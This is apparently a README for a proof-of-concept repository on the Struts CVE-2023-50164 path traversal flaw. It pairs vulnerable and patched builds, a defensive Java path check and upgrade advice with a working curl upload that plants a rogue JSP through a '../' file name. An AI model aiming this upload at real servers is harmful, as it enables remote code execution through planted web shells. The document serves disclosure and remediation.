This is a Proof of Concept (PoC) for CVE-2023-50164, a new path traversal vulnerability in struts-core that can lead to Remote Code Execution (RCE).

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of Henrik Plate found here.

Run the PoC

There are two Maven profiles in this project: vuln and no-vuln. vuln is the default.

To run with the RCE vuln, execute the following:

mvn clean jetty:run -P vuln

To run without the RCE vuln, execute the following:

mvn clean jetty:run -P no-vuln

The difference between the two profiles is that vuln uses struts-core version 6.3.0.1 (which has the path traversal vulnerability) and no-vuln uses struts-core version 6.3.0.2 (which does not have the path traversal vulnerability).

Exploit the Vuln

While running the vuln profile described above, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll be able to see the file rogue.jsp in the src/main/webapp folder and you can browse to it at: http://localhost:9999/struts-vuln-poc/rogue.jsp (you'll see a Ya been PWNED! message).

There is a code fix that works with the older Struts versions, but it is still highly advised to update your version of Struts.

To exercise the code fix, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll see an error message: Attempted path traversal attack

NOTE: If you use the no-vuln profile, you won't get an error message from the /upload-no-vuln endpoint, even if you use a relative path like ../src/main/webapp/rogue.jsp, because the new version of Struts automatically strips away relative path references.
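
One way an application-level check of the kind described above can reject a traversal file name before anything is written to disk. This is an added example, not the code in this repository; the class name, method name and `uploads` directory are assumptions, and only the error text is taken from the message shown above.

```java
import java.io.IOException;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

// Added illustration, not the repository's code. Class, method and directory names are assumptions.
public class UploadPathCheck {

    // Resolve a client-supplied file name under uploadDir; reject anything that escapes it.
    static Path resolveInside(Path uploadDir, String clientFileName) throws IOException {
        if (clientFileName == null || clientFileName.isEmpty()) {
            throw new IOException("Missing file name");
        }
        Path base = uploadDir.toAbsolutePath().normalize();
        Path target;
        try {
            // Treat '\' as a separator too, so Windows-style "..\" is caught on any platform.
            target = base.resolve(clientFileName.replace('\\', '/')).normalize();
        } catch (InvalidPathException e) {
            throw new IOException("Invalid file name", e);
        }
        // Path.startsWith compares whole path elements, so "/uploads-evil" does not match "/uploads".
        if (!target.startsWith(base) || target.equals(base)) {
            throw new IOException("Attempted path traversal attack");
        }
        return target;
    }

    public static void main(String[] args) {
        Path uploadDir = Paths.get("uploads"); // assumed upload directory
        String[] constructedNames = {          // constructed sample inputs
            "report.pdf",
            "../src/main/webapp/rogue.jsp",
            "docs/../../rogue.jsp",
            "/tmp/rogue.jsp"
        };
        for (String name : constructedNames) {
            try {
                System.out.println(name + " -> stored as " + resolveInside(uploadDir, name));
            } catch (IOException e) {
                System.out.println(name + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

The check runs on the normalized absolute path, so relative segments, nested `..` sequences and absolute paths are all evaluated against the same base directory.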